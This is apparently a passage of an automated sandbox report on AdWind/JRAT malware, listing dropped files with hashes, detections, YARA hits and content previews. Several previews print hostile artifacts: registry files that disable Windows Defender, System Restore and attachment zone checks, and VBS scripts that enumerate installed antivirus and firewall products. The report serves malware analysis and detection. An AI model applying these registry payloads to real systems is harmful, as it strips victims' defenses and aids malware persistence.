                                                                                                                                                                                              C:\ProgramData\Oracle\Java\.oracle_jre_usage\cce3fe3b0d8d83e2.timestamp
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                              Entropy (8bit):4.827903829688525
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:oFj4I5vpN6yUYCu4v:oJ5X6yN4v
                                                                                                                                                                                              MD5:3FA9DA5639015C0FFF49B84F73A51D75
                                                                                                                                                                                              SHA1:D5E56F2FE08B86A24EB5BF3859E0EFDB33171C18
                                                                                                                                                                                              SHA-256:B25511D60171DFB2638936A08E35E13647421096309506394DAC3EB84D127796
                                                                                                                                                                                              SHA-512:F48A209F5F8FB371D6AC7E8D5CBEBBF358DC4578D02F565A2C1F8EDE844F7E66096212BF1DA399B658EF44F98283D1E7D2926846858CABB5677A432D5F8BFD1A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: C:\Program Files (x86)\Java\jre1.8.0_211..1618900395512..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Config5175199137087621866.sqlite
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.792852251086831
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                                              MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                                              SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                                              SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                                              SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):27282
                                                                                                                                                                                              Entropy (8bit):5.34186246815709
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:PJWwXczWquoCtmtatLitmtJCtTt6tVtatNtgtitCtztHtxtMt8thtVRtTtstHtTs:PqgVnuR0hTmEgGpF
                                                                                                                                                                                              MD5:867B59911AF96958B890524CD9002132
                                                                                                                                                                                              SHA1:C8608B295945AC0AD6BD0A7C4CE04579494DA971
                                                                                                                                                                                              SHA-256:ED7FD6C48C814D80DCB80D36C3EE8686E48979BEC7A289B2612D4EF71F59756C
                                                                                                                                                                                              SHA-512:7E5C03DED713EEC2E1B268E09F9777A8CB2F6868BB25941A3A008CBA91551E36DC28275352AF5211151AA78E2C8B3C8347BA8044B31F29C3718C4E5A70FE742C
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Windows Registry Editor Version 5.00..[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=dword:00000001....[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;"....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments].."SaveZoneInformation"=-....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations].."LowRiskFileTypes"=-....[HKEY_CURRENT_USER\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment].."SEE_MASK_NOZONECHECKS"="1"....[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore].."DisableConfig"=dword:00000001.."DisableSR"=dword:00000001....[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Executio
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):276
                                                                                                                                                                                              Entropy (8bit):5.064973526456738
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                              MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                              SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                              SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                              SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):281
                                                                                                                                                                                              Entropy (8bit):5.093300055314052
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                              MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                              SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                              SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                              SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):276
                                                                                                                                                                                              Entropy (8bit):5.064973526456738
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTrLavbx3laDH6djsyn:vmtqvAndZFcrG9lpjsyn
                                                                                                                                                                                              MD5:3BDFD33017806B85949B6FAA7D4B98E4
                                                                                                                                                                                              SHA1:F92844FEE69EF98DB6E68931ADFAA9A0A0F8CE66
                                                                                                                                                                                              SHA-256:9DA575DD2D5B7C1E9BAB8B51A16CDE457B3371C6DCDB0537356CF1497FA868F6
                                                                                                                                                                                              SHA-512:AE5E5686AE71EDEF53E71CD842CB6799E4383B9C238A5C361B81647EFA128D2FEDF3BF464997771B5B0C47A058FECAE7829AEEDCD098C80A11008581E5781429
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""AV"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):281
                                                                                                                                                                                              Entropy (8bit):5.093300055314052
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:jpxiFtqvAAT+geD5NaqZxLMTQQQavbx3la2Zp6djsyn:vmtqvAndZFcQU9lrXyjsyn
                                                                                                                                                                                              MD5:A32C109297ED1CA155598CD295C26611
                                                                                                                                                                                              SHA1:DC4A1FDBAAD15DDD6FE22D3907C6B03727B71510
                                                                                                                                                                                              SHA-256:45BFE34AA3EF932F75101246EB53D032F5E7CF6D1F5B4E495334955A255F32E7
                                                                                                                                                                                              SHA-512:70372552DC86FE02ECE9FE3B7721463F80BE07A34126B2C75B41E30078CDA9E90744C7D644DF623F63D4FB985482E345B3351C4D3DA873162152C67FC6ECC887
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              Preview: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")..Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")..For Each objItem in colItems.. With objItem.. WScript.Echo "{""FIREWALL"":""" & .displayName & """}".. End With..Next..
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):46592
                                                                                                                                                                                              Entropy (8bit):6.0299567620950425
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:5iUNFqJL3HXiQl2DuhacwRZPE7dmvqID8ouM2PkYEDienAZu+P:TNFW33hdxwz87dmRDbkPKg
                                                                                                                                                                                              MD5:0B7B52302C8C5DF59D960DD97E3ABDAF
                                                                                                                                                                                              SHA1:D85524F464DCDED54EDFCFE6A5056F6C4008BBCB
                                                                                                                                                                                              SHA-256:A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
                                                                                                                                                                                              SHA-512:FA04A69CACD05042DC9F3EF0BB518B01952B59A5A2669BA3817C3E248E95F54801349CB51FCFA7CD1F3C4CB7C28615A61156D574C4F7197FDBA709544A5E8EBC
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                              • Rule: JoeSecurity_AdWind_dll, Description: Yara detected AdWind RAT\'s dll, Source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, Author: Joe Security
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 75%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: PO SKP 149684.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: CHEQUE COPY.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Ramon_w2-1040_PDF.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Payment.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: POHD512-6 5700.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: PAYMENT SWIFT COPY.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: box.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 02_ntfsmgr.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Company profile and Purchase Order.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 0076364_00533MXS2.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Order.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: ORDER.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: Rejected_Stimulus.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: COMMUNIQUE2.pdf.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              • Filename: PAYMENT SWIFT.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: PAYMENT SWIFT.jar, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              • Filename: , Detection: malicious, Browse
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../../../..@.a.9..@.T.!..@.`.z..&.Y.*../..~..@.e....@.Q....@.W....Rich/..........PE..L.....uW...........!.....p...B......8...............................................R3....@.........................p..........<...............................<...`...............................0...@...............$............................text...Zo.......p.................. ..`.rdata..%%.......&...t..............@..@.data....+..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):39424
                                                                                                                                                                                              Entropy (8bit):5.830789080830882
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:1bsFy+m3Eq3booHrhmkkGn2OEDffZlchud0:1j73fdmkLwH
                                                                                                                                                                                              MD5:C17B03D5A1F0DC6581344FD3D67D7BE1
                                                                                                                                                                                              SHA1:D39F33C514B9DABAFD3502D8E57E6EF078B1B454
                                                                                                                                                                                              SHA-256:1AFB6AB4B5BE19D0197BCB76C3B150153955AE569CFE18B8E40B74B97CCD9C3D
                                                                                                                                                                                              SHA-512:6B41F2FD24F7667FC0FFAF94967BE0E7C1EFEE655AECD01F867C142FC81281DB631BE66FFEFD4D7E69BAF1674292A79A8B110B7B12A2EBE71128C2CC1A1C82B0
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 49%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."...LW..LW..LW...W..LW...W..LW...W..LW..W..LW..MW..LW...W..LW...W..LW...W..LWRich..LW........................PE..L......V...........!.....N...H...............`.......................................e....@.........................P.......|...P...................................0a..................................@............`...............................text...hM.......N.................. ..`.rdata...)...`...*...R..............@..@.data...<............|..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):247088
                                                                                                                                                                                              Entropy (8bit):7.977146417027946
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6144:WI5pxUZ7Gvi8ulm+yV/rIF0/MO2qnan1J7pXESN6U:J5pxAGqNkrIq/MO2qnA
                                                                                                                                                                                              MD5:781FB531354D6F291F1CCAB48DA6D39F
                                                                                                                                                                                              SHA1:9CE4518EBCB5BE6D1F0B5477FA00C26860FE9A68
                                                                                                                                                                                              SHA-256:97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9
                                                                                                                                                                                              SHA-512:3E6630F5FEB4A3EB1DAC7E9125CE14B1A2A45D7415CF44CEA42BC51B2A9AA37169EE4A4C36C888C8F2696E7D6E298E2AD7B2F4C22868AAA5948210EB7DB220D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                              • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class, Author: Florian Roth
                                                                                                                                                                                              Preview: PK........A.QJ................META-INF/MANIFEST.MF....M.1..0...@...u.XA(.jq.bED..y.@LJ."..F;(.r..w..yPL.J!..$..5g..#.]O.Y..O|.u...x...8Q[..^.Zh.Pk.c.OL.Ck'h.Fc5g.8a.%@..0...I....V.E..&`g.j....wK.~w..@3G.:.1q...PK..\..........PK........A.QJ................iQA/Fjx/ywe.u..@....Y.u.....,.`D.#.......:q......P.Up....n...F.z8'...."....P.Fu.....{.Lw.M.r5...c.}..U.L*...^j{a'..0JF^r.Y......a.~.f\..z....p... .^.%.v.E.k..6aP..WZ...-#L.c).'B..#n.K.....A....npG....p).x..z..u... .e'.'.j...&<....H..]wJ.[.....|...].....[Xy...o.Dh.I....B........z.."7Lh.1."EU..7n.9......J50..12....#.!...%........[9U..7.e`[...7.*..\...\..t*.l....j"*..H..B.K....".!....!..p...\|<{U......8.6..7.4....e..5)%....}.0.N...O....A..x$..]......Cz..?.KUD=..)=....=c..b.4oD......U...U..i.'k.....@.....r:.t.\.n..n...+..'..,WE.B.M.n.. ..A.W.u.T...{`.=..[e3.C.p...._.LC..V..?....._...v;.|p.zw......._@....9...*5...J...2.!.#S..Oj....<]+.5)*+.u...d......\..u......w..n..>..-&B...!._b6.Mv.VS.W.e......."
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):143
                                                                                                                                                                                              Entropy (8bit):5.215498656146558
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:jBJ0nMWXZ6RKZFNKugLxqyB+zfyM1KJA7Bm22SEXAHsJ7V/7v:jBJ0nMhRKLNK9Lx78zH18A7BB1EXisJR
                                                                                                                                                                                              MD5:0E5411D7ECBA9A435AFDA71C6C39D8FD
                                                                                                                                                                                              SHA1:2D6812052BF7BE1B5E213E1D813AE39FAA07284C
                                                                                                                                                                                              SHA-256:CB68D50DF5817E51EC5B2F72893DC4C749BF3504519107E0A78DDA84D55F09E2
                                                                                                                                                                                              SHA-512:903AC6E5C8A12607AF267B54BCBBEDFA5542C5B4F7EA289AB7C6A32A424D5B846AE406D830CB4AD48E2B46F92C504163C0856AF8C3E09685A8855F39F616DDB1
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Preview: Windows Registry Editor Version 5.00..[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]."DisableAntiSpyware"=dword:00000001....
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):695808
                                                                                                                                                                                              Entropy (8bit):6.430026624943613
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:F1Ty5f/GBgQbkkH13Lxewo3CoGOJwdzRI3XHCYLKxX7XjSt0yaAfIou4KxR92l:F1TyQBgQbkkHRNeweCIyd1I3XiYL6X7V
                                                                                                                                                                                              MD5:A4E510D903F05892D77741C5F4D95B5D
                                                                                                                                                                                              SHA1:754781BA8E1C574B830AE2A239CCCCDA2C4B5E70
                                                                                                                                                                                              SHA-256:A3FBDF4FBDF56AC6A2EBEB4C131C5682F2E2EADABC758CFE645989C311648506
                                                                                                                                                                                              SHA-512:9A3AE623B1469357EC8E7EFDE4F14AA838DE2011495F8D3504D6B97293AA0957762D231BE43E57926F8EF8E38067268FB98B99D8FD612219B07181E47AE60F10
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..U...........#.....^.......... ........p.....j.......................................... .................................|................................5..................................................l................................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..4............v..............@.`@.bss.........p........................`..edata...............H..............@.0@.idata..|............T..............@.0..CRT....,............d..............@.0..tls.... ............f..............@.0..reloc...5.......6...h..............@.0B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\83aa4cc77f591dfc2374580bbd95f6ba_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                                                                                                                                                                              Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):45
                                                                                                                                                                                              Entropy (8bit):0.9111711733157262
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:/lwlt7n:WNn
                                                                                                                                                                                              MD5:C8366AE350E7019AEFC9D1E6E6A498C6
                                                                                                                                                                                              SHA1:5731D8A3E6568A5F2DFBBC87E3DB9637DF280B61
                                                                                                                                                                                              SHA-256:11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
                                                                                                                                                                                              SHA-512:33C980D5A638BFC791DE291EBF4B6D263B384247AB27F261A54025108F2F85374B579A026E545F81395736DD40FA4696F2163CA17640DD47F1C42BC9971B18CD
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: ........................................J2SE.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\COPYRIGHT
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:ISO-8859 text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):3244
                                                                                                                                                                                              Entropy (8bit):4.504892344419146
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:3kjJXQSqgbiihCrRbo+Q/cV0rDcFBL3P0/r3:3cAaOi01E+xV0rDaBL3P0z3
                                                                                                                                                                                              MD5:A762796B2A8989B8952B653A178607A1
                                                                                                                                                                                              SHA1:C725183C757011E7BA96C83C1E86EE7E8B516A2B
                                                                                                                                                                                              SHA-256:79CCB53E0DBDB8EC16747A516EB77C3737C797E544AAA0A552B8A886A70EEF69
                                                                                                                                                                                              SHA-512:9D88BD2910A0D7820732D498B11B4676A5A122F24093640D8F07D417E4D7077A3D411F5F3E96CC124483DBED9C940B9526CA8B19FBC7CE69CB294476FCAA6C91
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Copyright . 1993, 2018, Oracle and/or its affiliates..All rights reserved...This software and related documentation are provided under a.license agreement containing restrictions on use and.disclosure and are protected by intellectual property laws..Except as expressly permitted in your license agreement or.allowed by law, you may not use, copy, reproduce, translate,.broadcast, modify, license, transmit, distribute, exhibit,.perform, publish, or display any part, in any form, or by.any means. Reverse usering, disassembly, or.decompilation of this software, unless required by law for.interoperability, is prohibited...The information contained herein is subject to change.without notice and is not warranted to be error-free. If you.find any errors, please report them to us in writing...If this is software or related documentation that is.delivered to the U.S. Government or anyone licensing it on.behalf of the U.S. Government, the following notice is.applicable:..U.S. GOVERNMENT END US
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\LICENSE
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):44
                                                                                                                                                                                              Entropy (8bit):4.322179345516666
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:c3AXFshzYoQ4XTn:c9hzYUXT
                                                                                                                                                                                              MD5:432427FE963E254F41915D5FFA20928D
                                                                                                                                                                                              SHA1:500CF349A204DCD6497F9789884BC8C3F2657212
                                                                                                                                                                                              SHA-256:3DD5B54C70C5942B771786C2D1511A9A60CCC1D30CDCA0A5FE9A2CEE107119FA
                                                                                                                                                                                              SHA-512:04FC154B57729FCCAED106E1A709ED6F116554D1261E9C4132EBBB89E943E65AA50BBE1F6C187CE75787692359725243F45B5A8ED3EE7CFB1C5186A881A5BA6B
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Please refer to https://java.com/bc_license.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\README.txt
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):46
                                                                                                                                                                                              Entropy (8bit):4.197049999347145
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:c3AXFshzhRSkU:c9hzhgkU
                                                                                                                                                                                              MD5:0F1123976B959AC5E8B89EB8C245C4BD
                                                                                                                                                                                              SHA1:F90331DF1E5BADEADC501D8DD70714C62A920204
                                                                                                                                                                                              SHA-256:963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2
                                                                                                                                                                                              SHA-512:E9136FDF42A4958138732318DF0B4BA363655D97F8449703A3B3A40DDB40EEFF56363267D07939889086A500CB9C9AAF887B73EEAD06231269116110A0C0A693
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: Please refer to http://java.com/licensereadme.
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):112748
                                                                                                                                                                                              Entropy (8bit):4.843314745575208
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3072:ig3JrYrpltztZvepyF6qN7amC3lqN7amC3pqN7amC3K:L3XqN2plqN2ppqN2pK
                                                                                                                                                                                              MD5:FE4BB0E003D7600BAE6D18237C3D08D0
                                                                                                                                                                                              SHA1:B46C7DA4401D3513942885B4EAA8DAA2C71B3761
                                                                                                                                                                                              SHA-256:31985DE04028045F7D0CE01717CE9FC0A25AE86229BB111870518C23E80B8758
                                                                                                                                                                                              SHA-512:26B0E6780EE644426CADAE2185DCFC85A66E6E05D228183FE7B6F28FCE05A53B081D6C571889C0EBFE91B33B0D1EADB557F4CD716B156ABFDF1EF7639F662008
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: .DO NOT TRANSLATE OR LOCALIZE..***************************************************************************..%%The following software may be included in this product:.Apple Computer: CoreAudio Utility Classes v2.0..Notice: This software is present only on Mac OS X systems...Disclaimer: IMPORTANT: This Apple software is supplied to you by Apple.Inc. ("Apple") in consideration of your agreement to the following.terms, and your use, installation, modification or redistribution of.this Apple software constitutes acceptance of these terms. If you do.not agree with these terms, please do not use, install, modify or.redistribute this Apple software...In consideration of your agreement to abide by the following terms, and.subject to these terms, Apple grants you a personal, non-exclusive.license, under Apple's copyrights in this original Apple software (the."Apple Software"), to use, reproduce, modify and redistribute the Apple.Software, with or without modifications, in source and/or binary
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\xcopy.exe
